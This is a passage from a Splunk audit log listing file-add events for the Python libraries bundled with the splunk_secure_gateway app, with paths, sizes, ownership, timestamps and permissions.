size=84726, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.092, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_arena_pb2.py", isdir=0, size=4459, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.087, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/type_pb2.py", isdir=0, size=22405, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/timestamp_pb2.py", isdir=0, size=2730, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.069, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/text_format.py", isdir=0, size=51634, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.062, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/text_encoding.py", isdir=0, size=4617, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.055, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/test_messages_proto3_pb2.py", isdir=0, size=115424, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.049, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/test_messages_proto2_pb2.py", isdir=0, size=104956, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.043, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/symbol_database.py", isdir=0, size=6429, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.039, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/struct_pb2.py", isdir=0, size=10807, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.034, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/source_context_pb2.py", isdir=0, size=2456, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.031, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/service_reflection.py", isdir=0, size=11023, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.027, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/service.py", isdir=0, size=9144, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.024, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/reflection.py", isdir=0, size=4568, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.019, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/pyext", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:32.016, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/proto_builder.py", isdir=0, size=5208, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.013, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/message_factory.py", isdir=0, size=6291, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.009, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/message.py", isdir=0, size=11454, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.005, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/map_unittest_pb2.py", isdir=0, size=121531, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.001, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/map_proto2_unittest_pb2.py", isdir=0, size=53646, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.995, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/json_format.py", isdir=0, size=29835, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.990, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:31.983, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/field_mask_pb2.py", isdir=0, size=2341, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.977, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/empty_pb2.py", isdir=0, size=1859, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.972, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/duration_pb2.py", isdir=0, size=2710, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.967, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/descriptor_pool.py", isdir=0, size=37914, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.961, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/descriptor_pb2.py", isdir=0, size=92218, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.955, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/descriptor_database.py", isdir=0, size=6295, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.950, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/descriptor.py", isdir=0, size=41646, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.943, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/compiler", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:31.939, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/api_pb2.py", isdir=0, size=11001, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.935, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/any_test_pb2.py", isdir=0, size=3233, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.931, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/any_pb2.py", isdir=0, size=2616, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.926, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:31.922, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__init__.py", isdir=0, size=1890, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.514, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:31.510, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:31.505, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.500, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info/top_level.txt", isdir=0, size=5, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.491, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.486, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info/RECORD", isdir=0, size=2587, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info/METADATA", isdir=0, size=10220, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info/LICENSE", isdir=0, size=1082, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.471, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.467, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info/AUTHORS.rst", isdir=0, size=752, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.362, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/types/union.py", isdir=0, size=3211, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.358, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/types/serializable.py", isdir=0, size=3641, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.355, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/types/net.py", isdir=0, size=9299, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.351, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/types/compound.py", isdir=0, size=15266, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/types/base.py", isdir=0, size=42023, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/types/__init__.py", isdir=0, size=113, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.235, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/contrib/mongo.py", isdir=0, size=1368, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.229, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/contrib/machine.py", isdir=0, size=2272, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.224, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/contrib/enum_type.py", isdir=0, size=2419, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.220, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/contrib/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.215, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/validate.py", isdir=0, size=4207, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.211, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/util.py", isdir=0, size=5328, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.207, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/undefined.py", isdir=0, size=1422, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.203, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/types", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:31.199, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/translator.py", isdir=0, size=927, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.196, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/transforms.py", isdir=0, size=13865, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.191, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/schema.py", isdir=0, size=1934, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.187, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/role.py", isdir=0, size=3330, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.182, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/models.py", isdir=0, size=15133, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.176, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/iteration.py", isdir=0, size=2693, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.172, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/exceptions.py", isdir=0, size=7504, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.168, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/deprecated.py", isdir=0, size=3686, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.164, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/datastructures.py", isdir=0, size=10473, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.160, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/contrib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:31.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/compat.py", isdir=0, size=2718, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.152, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/common.py", isdir=0, size=708, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:31.148, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics/__init__.py", isdir=0, size=272, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers-2.3.0.dist-info/top_level.txt", isdir=0, size=17, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.939, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers-2.3.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.934, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers-2.3.0.dist-info/RECORD", isdir=0, size=1115, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.930, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers-2.3.0.dist-info/METADATA", isdir=0, size=10666, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.926, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers-2.3.0.dist-info/LICENSE", isdir=0, size=557, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.923, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers-2.3.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.919, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict-5.1.0.dist-info/top_level.txt", isdir=0, size=10, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.915, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict-5.1.0.dist-info/WHEEL", isdir=0, size=112, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.911, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict-5.1.0.dist-info/RECORD", isdir=0, size=2003, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.908, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict-5.1.0.dist-info/METADATA", isdir=0, size=4094, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict-5.1.0.dist-info/LICENSE", isdir=0, size=11349, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.900, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict-5.1.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.791, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/__pycache__/_itertools.cpython-37.pyc", isdir=0, size=584, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:30.787, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/__pycache__/_functools.cpython-37.pyc", isdir=0, size=2644, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:30.783, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/__pycache__/_compat.cpython-37.pyc", isdir=0, size=2468, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:30.779, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/__pycache__/_collections.cpython-37.pyc", isdir=0, size=1514, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:30.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/__pycache__/__init__.cpython-37.pyc", isdir=0, size=33189, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:30.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/py.typed", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.766, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/_itertools.py", isdir=0, size=607, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.762, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/_functools.py", isdir=0, size=2501, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.758, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/_compat.py", isdir=0, size=2384, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.754, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/_collections.py", isdir=0, size=743, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.749, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:30.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata/__init__.py", isdir=0, size=26808, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.641, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/uts46data.py", isdir=0, size=202084, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.637, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/package_data.py", isdir=0, size=22, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.632, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/intranges.py", isdir=0, size=1749, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/idnadata.py", isdir=0, size=42350, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.624, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/core.py", isdir=0, size=11951, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.620, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/compat.py", isdir=0, size=232, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.616, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/codec.py", isdir=0, size=3299, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.612, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna/__init__.py", isdir=0, size=58, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/_distutils_hack/override.py", isdir=0, size=44, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.604, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/_distutils_hack/__init__.py", isdir=0, size=3552, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.499, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/utils.py", isdir=0, size=30529, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:30.494, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests/structures.py", isdir=0, size=3005, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", 